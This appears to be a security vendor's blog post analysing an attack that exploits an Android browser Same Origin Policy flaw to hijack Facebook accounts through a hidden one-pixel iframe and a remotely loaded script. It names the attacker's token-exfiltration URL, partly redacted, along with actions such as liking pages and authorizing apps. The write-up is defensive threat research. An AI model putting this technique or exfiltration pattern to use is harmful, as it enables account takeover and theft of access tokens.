A few months back, we discussed the Android Same Origin Policy (SOP) vulnerability, which we later found to have a wider reach than first thought. Now, under the collaboration of Trend Micro and Facebook, attacks are found which actively attempt to exploit this particular vulnerability, whose code we believe was based in publicly available Metasploit code.
This attack targets Facebook users via a link in a particular Facebook page that leads to a malicious site. This page contains obfuscated JavaScript code (see in Figure 1 below), which includes an attempt to load a Facebook URL (seen in Figure 2) in an inner frame. The user will only see a blank page as the page's HTML has been set not to display anything via its div tag (Figure 3), while the inner frame has a size of one pixel (Figure 4).
Figure 1. Malware code segment upon opening the Facebook page
Figure 2. Corresponding content of opened Facebook page
Figure 3. The main page is set to be invisible
Figure 4. The inner frame has a size of one pixel
While these routines are being carried out, the SOP bypass is being performed. A remote JavaScript file is loaded from a legitimate cloud storage provider:Figure 5. The JavaScript file that performs SOP bypass
The said file contains the malicious code of this attack and allows attackers to carry out the following activities or routines on Facebook:- Add friends
- Like and follow Facebook pages
- Modify subscriptions
- Authorize a Facebook app to access the user’s public profile, friends list, birthday information, likes and friends’ likes
- Steal the victim’s access tokens and upload them to their server at http://{BLOCKED}martforchristmas.website/walmart/j/index.php?cid=544fba6ac6988&access_token= $token;
- Collect analytics data (such as victims’ location, HTTP referrer, etc.) using the legitimate service at https://whos.{BLOCKED}ung.us/pingjs/
Tags